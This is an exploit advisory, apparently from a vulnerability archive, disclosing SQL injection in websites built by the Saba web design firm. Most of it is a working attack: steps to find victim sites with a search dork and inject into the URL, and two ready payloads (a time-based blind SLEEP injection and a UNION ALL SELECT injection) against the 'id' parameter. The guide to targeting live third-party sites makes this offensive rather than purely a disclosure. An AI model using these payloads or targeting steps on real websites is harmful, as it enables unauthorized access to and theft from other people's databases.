Design and Development of Saba website - SQL Injection

2021.07.17
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Author: Aryan Chehreghani # Vendor Homepage: http://www.sabawww.ir # Tested on: Windows # CVE : N/A ========================================= #Description Saba Website Design, web application design and programming. #poc Step 1 - Find Your Target Using Dork. Step 2 - Find Open Value In Websites Url. Step 3 - Inject Your Payloads in URL. #TEST Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=34' AND (SELECT 2894 FROM (SELECT(SLEEP(5)))vkbX) AND 'lVCi'='lVCi Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=-5154' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a627a71,0x4447597349626678774f754a64756965554469767562416c576b6956417a59764a654c5565435755,0x7176767171)-- - ================================================== /*/ TAPESH DIGITAL SECURITY TEAM IRAN / T.ME/ICTUS_TM تیم امنیت سایبری اپش


Vote for this issue:
70%
30%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top